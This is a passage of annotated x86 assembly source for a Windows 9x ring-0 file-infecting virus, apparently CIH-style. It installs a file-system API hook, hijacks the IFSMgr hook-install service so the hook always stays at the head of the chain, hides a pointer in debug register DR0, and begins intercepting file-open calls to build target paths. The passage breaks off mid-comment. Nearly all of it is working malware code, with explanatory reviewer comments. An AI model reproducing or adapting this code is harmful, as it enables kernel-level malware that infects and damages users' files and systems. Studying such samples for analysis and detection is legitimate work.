; *************************************                                          
; * Install My File System Api Hook   *                                          
; *************************************                                          
                                                                                 
InstallMyFileSystemApiHook:
; Ring-0 initialisation step: register FileSystemApiHook with IFSMgr, then
; take over the IFSMgr_InstallFileSystemApiHook service itself so that every
; hook installed later by any other caller is routed through
; InstallFileSystemApiHook below (which keeps this hook first in the chain).
; In:   edi = base for @6-relative addressing, esi = base for @2-relative
;       addressing (both set up before this label; the bases are not visible
;       in this listing).
; Out:  does not return here -- ends with jmp ExitRing0Init (defined elsewhere).
; Clobbers: eax, ecx, edx, flags. Leaves interrupts disabled (cli).

                        ; eax = address of FileSystemApiHook, computed from the
                        ; @6 base in edi (position independent, no absolute address)
                        lea     eax, FileSystemApiHook-@6[edi]

                        push    eax  ; argument: hook procedure to install
                        int     20h  ; VXDCALL IFSMgr_InstallFileSystemApiHook
IFSMgr_InstallFileSystemApiHook =       $       ; address of the service-id dword below
                        dd      00400067h       ; Use EAX, ECX, EDX, and flags
                                                ; (0040h = IFSMgr device, 0067h = service ordinal)

                        ; The returned value (address of the previous hook) is parked
                        ; in debug register DR0, which this code uses as a global
                        ; variable instead of a memory cell; InstallFileSystemApiHook
                        ; refreshes it. Reviewer note: a non-zero DR0 with no debugger
                        ; attached is a detectable artifact of this technique.
                        mov     dr0, eax        ; Save OldFileSystemApiHook Address

                        pop     eax     ; EAX = FileSystemApiHook Address (callee left the arg on the stack)

                        ; Save Old IFSMgr_InstallFileSystemApiHook Entry Point
                        ; ecx = contents of the dword at the VxDCall thunk above.
                        ; NOTE(review): this relies on VMM having rewritten the
                        ; "int 20h / dd" pair on its first execution so that the dword
                        ; now holds the address of IFSMgr's service-table slot --
                        ; confirm against the dynamic-link behaviour of the target VMM.
                        mov     ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]
                        mov     edx, [ecx]      ; edx = current entry point of the service
                        mov     OldInstallFileSystemApiHook-@3[eax], edx   ; stash for chaining (writes into the code image)

                        ; Modify IFSMgr_InstallFileSystemApiHook Entry Point
                        ; Point the service slot at the replacement below: from now on
                        ; every IFSMgr_InstallFileSystemApiHook call lands in
                        ; InstallFileSystemApiHook instead of IFSMgr's own code.
                        lea     eax, InstallFileSystemApiHook-@3[eax]
                        mov     [ecx], eax

                        cli     ; interrupts stay off on the way into ExitRing0Init

                        jmp     ExitRing0Init   ; defined outside this listing
                                                                                 
; *********************************************************                      
; *             Code Size of Merge Virus Code Section     *                      
; *********************************************************                      
                                                                                 
; Marks the end of the "merge" code section: the distance from the section
; start to this point. Presumably consumed as a byte count by code outside
; this listing -- note that InstallFileSystemApiHook, the static data and
; FileSystemApiHook below all lie past this mark.
CodeSizeOfMergeVirusCodeSection         =       offset $
                                                                                 
; *********************************************************                      
; *             IFSMgr_InstallFileSystemApiHook           *                      
; *********************************************************                      
                                                                                 
InstallFileSystemApiHook:
; Replacement for the IFSMgr_InstallFileSystemApiHook service, reached via
; the service-table slot patched in InstallMyFileSystemApiHook.
; Behaviour: (1) remove this code's own FileSystemApiHook, (2) let the real
; service install the caller's hook, (3) re-install FileSystemApiHook, so
; that it is always the first hook in IFSMgr's chain regardless of who
; installs hooks later (a "stay on top" re-hooking technique).
; In:   [esp+4] = caller's hook procedure (single stack argument).
; Out:  eax = whatever the real service returned for the caller's hook;
;       DR0 = value returned for the re-installed FileSystemApiHook,
;       labelled "OldFileSystemApiHook Address" by the original comments
;       (presumably read by the hook's chaining path, not visible here).
; Stack: the argument is left in place for the caller to remove (plain ret),
;        matching how InstallMyFileSystemApiHook pops after its own VxDCall.
; Clobbers: eax, ecx, edx, flags. ebx is saved and restored.
                        push    ebx

                        ; ebx = address of FileSystemApiHook via call/pop
                        ; (self-relocating; this code uses no absolute addresses)
                        call    @4      ;
@4:                                     ;
                        pop     ebx     ; mov ebx, offset FileSystemApiHook
                        add     ebx, FileSystemApiHook-@4       ;

                        ; (1) Unhook ourselves so the caller's hook is linked cleanly.
                        push    ebx
                        int     20h  ; VXDCALL IFSMgr_RemoveFileSystemApiHook
IFSMgr_RemoveFileSystemApiHook  =       $
                        dd      00400068h       ; Use EAX, ECX, EDX, and flags
                        pop     eax     ; discard the argument

                        ; (2) Call Original IFSMgr_InstallFileSystemApiHook
                        ; to Link Client FileSystemApiHook
                        ; Stack here: [esp] = saved ebx, [esp+4] = return address,
                        ; [esp+8] = the caller's hook procedure.
                        push    dword ptr [esp+8]
                        call    OldInstallFileSystemApiHook-@3[ebx]
                        pop     ecx     ; discard the argument

                        push    eax     ; preserve the caller's result across the next call

                        ; (3) Call Original IFSMgr_InstallFileSystemApiHook
                        ; to Link My FileSystemApiHook (back at the head of the chain)
                        push    ebx
                        call    OldInstallFileSystemApiHook-@3[ebx]
                        pop     ecx     ; discard the argument

                        ; Refresh the link kept in DR0 (same debug-register storage
                        ; trick as in InstallMyFileSystemApiHook); the chain beneath
                        ; this hook now includes the caller's hook.
                        mov     dr0, eax        ; Adjust OldFileSystemApiHook Address

                        pop     eax     ; hand back the caller's result, not ours

                        pop     ebx

                        ret
                                                                                 
; *********************************************************                      
; *                     Static Data                       *                      
; *********************************************************                      
                                                                                 
; Saved entry point of the real IFSMgr_InstallFileSystemApiHook service.
; Written by InstallMyFileSystemApiHook (mov OldInstallFileSystemApiHook-@3[eax], edx)
; and called through by InstallFileSystemApiHook; always addressed relative
; to @3 (= FileSystemApiHook). Note this writable cell sits inside the code
; image rather than in a data section.
OldInstallFileSystemApiHook     dd      ?
                                                                                 
; *********************************************************                      
; *             IFSMgr_FileSystemHook                     *                      
; *********************************************************                      
                                                                                 
; *************************************                                          
; * IFSMgr_FileSystemHook Entry Point *                                          
; *************************************                                          
                                                                                 
FileSystemApiHook:                                                               
@3                      =       FileSystemApiHook                                
                                                                                 
                        pushad                                                   
                                                                                 
                        call    @5      ;                                        
@5:                                     ;                                        
                        pop     esi     ; mov esi, offset VirusGameDataStartAdd  
ss                                                                               
                        add     esi, VirusGameDataStartAddress-@5                
                                                                                 
; *************************************                                          
; * Is OnBusy !?                      *                                          
; *************************************                                          
                                                                                 
                        test    byte ptr (OnBusy-@6)[esi], 01h  ; if ( OnBusy )  
                        jnz     pIFSFunc                        ; goto pIFSFunc  
                                                                                 
; *************************************                                          
; * Is OpenFile !?                    *                                          
; *************************************                                          
                                                                                 
                        ; if ( NotOpenFile )                                     
                        ; goto prevhook                                          
                        lea     ebx, [esp+20h+04h+04h]                           
                        cmp     dword ptr [ebx], 00000024h                       
                        jne     prevhook                                         
                                                                                 
; *************************************                                          
; * Enable OnBusy                     *                                          
; *************************************                                          
                                                                                 
                        inc     byte ptr (OnBusy-@6)[esi]       ; Enable OnBusy  
                                                                                 
; *************************************                                          
; * Get FilePath's DriveNumber,       *                                          
; * then Set the DriveName to         *                                          
; * FileNameBuffer.                   *                                          
; *************************************                                          
; * Ex. If DriveNumber is 03h,        *                                          
; *     DriveName is 'C:'.            *                                          
; *************************************                                          
                                                                                 
                        ; mov esi, offset FileNameBuffer                         
                        add     esi, FileNameBuffer-@6                           
                                                                                 
                        push    esi                                              
                                                                                 
                        mov     al, [ebx+04h]                                    
                        cmp     al, 0ffh                                         
                        je      CallUniToBCSPath                                 
                                                                                 
                        add     al, 40h                                          
                        mov     ah, ':'                                          
                                                                                 
                        mov     [esi], eax                                       
                                                                                 
                        inc     esi                                              
                        inc     esi                                              
                                                                                 
; *************************************                                          
; * UniToBCSPath                      *                                          
; *************************************                                          
; * This Service Converts             *                                          
; * a Canonicalized Unicode Pathname  *                                          
; * to a Normal Pathname in the       *                                          
